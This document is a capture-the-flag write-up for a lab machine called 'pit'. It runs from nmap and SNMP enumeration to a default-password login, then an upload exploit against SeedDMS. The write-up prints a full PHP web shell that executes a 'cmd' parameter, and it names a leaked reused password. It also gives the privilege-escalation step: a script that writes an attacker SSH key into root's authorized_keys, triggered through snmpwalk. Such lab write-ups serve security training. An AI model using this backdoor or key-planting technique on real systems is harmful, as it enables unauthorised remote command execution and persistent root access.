NMAP

Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-13

22:00 IST
Nmap scan report for 10.10.10.241
Host is up (0.13s latency).

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.0 (protocol
2.0)
| ssh-hostkey:
| 3072
6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
| 256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7
(ECDSA)
|_ 256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50
(ED25519)
80/tcp open http nginx 1.14.1
|_http-title: Test Page for the Nginx HTTP Server on
Red Hat Enterprise Linux
|_http-server-header: nginx/1.14.1
9090/tcp open ssl/zeus-admin?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dms-
pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f
92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb,
DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after: 2030-06-04T16:09:12
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad request
| Content-Type: text/html; charset=utf8
| Transfer-Encoding: chunked
| X-DNS-Prefetch-Control: off
| Referrer-Policy: no-referrer
| X-Content-Type-Options: nosniff
| Cross-Origin-Resource-Policy: same-origin
| <!DOCTYPE html>
| <html>
| <head>
| <title>
| request
| </title>
| <meta http-equiv="Content-Type"
content="text/html; charset=utf-8">
| <meta name="viewport" content="width=device-
width, initial-scale=1.0">
| <style>
| body {
| margin: 0;
| font-family: "RedHatDisplay", "Open Sans",
Helvetica, Arial, sans-serif;
| font-size: 12px;
| line-height: 1.66666667;
| color: #333333;
| background-color: #f5f5f5;
| border: 0;
| vertical-align: middle;
| font-weight: 300;
|_ margin: 0 0 10p

SNMP
 PORT STATE SERVICE
161/udp open snmp
| snmp-processes:
| 1:
| 2:
| 3:
| 4:
|_ 5:
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 4ca7e41263c5985e00000000
| snmpEngineBoots: 76
|_ snmpEngineTime: 37s
| snmp-sysdescr: Linux pit.htb 4.18.0-
305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC
2021 x86_64
|_ System uptime: 37.94s (3794 timeticks)

SNMP
snmpwalk -v2c -c public 10.10.10.241 . | tee
snmpwalk.out

Looks like it is executing /usr/bin/monitoring output can be seen

below

Also I found a directory /var/www/html/seeddms51x/seeddms

I did not found seeddms when I tried to find the url with the ip
http://10.10.10.241/seeddms51x/seeddms

Took a look at port 9090 certificate

Added it to /etc/hosts
In the snmp Output I also found a username michelle

I ll try a default password username/username

michelle:michelle worked.
Did a searchsploit against seeddms

The RCE sticks out but we have a newer version. 5.1.15

Downloaded the changelog

They added a .htaccess, this won't work because the server is
running nginx and not apache adding .htaccess won't do anything.

I ll exploit the rce vulnerability.

https://bryanleong98.medium.com/cve-2019-12744-remote-
command-execution-through-unvalidated-file-upload-in-seeddms-
versions-5-1-1-5c32d90fda28

I need to add a document in the document I can add a php backdoor.

I can add document here -> http://dms-
pit.htb/seeddms51x/seeddms/out/out.AddDocument.php?
folderid=8&showtree=1

Added this as document.

<?php

if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}

?>
Add document.

The backdoor can be located but first we need to know the document
id ->

When hovering your mouse over the file name we can see the
document id. mine is 29
Change your document id in the below url.
http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=id

I tried to get a reverse shell but I was not able to, some kind of
firewall maybe so I used what I had to get some credentials.

There is a conf directory.

Which has a settings.xml

Did not find credentials in settings.xml

Enumerating more there was another conf directory in one more ../
../../../conf/settings.xml

I ll check for password reuse.

On port 9090 It worked with michelle:ied^ieY6xoquu

PORT 9090
I have a web terminal

I remember previously when I ran snmp scan it was executing

/usr/bin/monitor

It is executing anything that starts with a check and ends with sh in

/usr/local/monitoring.
At first I was stuck that there were no write permissions in
/usr/local/monitoring but using gefacl gave a clear picture.

[michelle@pit ~]$ ls -la /usr/local/ | grep monitoring

drwxrwx---+ 2 root root 101 Feb 14 12:30 monitoring

because of the + symbol in the permissions I used getfacl. which

means there’s additional ACLs set on the directory.

[michelle@pit ~]$ getfacl /usr/local/monitoring

getfacl: Removing leading '/' from absolute path names
# file: usr/local/monitoring
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::---

michael can write and execute, but can't read, that is why when I tried
to read anything I got an error.

Now I ll use the snmpwalk again and hope my commands get

executed and i see hello in output

snmpwalk -v2c -c public 10.10.10.241 NET-SNMP-EXTEND-

MIB::nsExtendObjects
I tried using a reverse shell but it did not work, firewall, so i inserted
ssh keys to target

echo 'echo ssh-ed25519

AAAAC3NzaC1lZDI1NTE5AAAAIKcfMwIbRY6rYQ2lRnLmzzJKA5HAYC1
xuyTpxCQbJ+o0 > /root/.ssh/authorized_keys' >
check_hello.sh

Running the snmpwalk command ssh key was written to

/root/.ssh/authorized_keys.

Root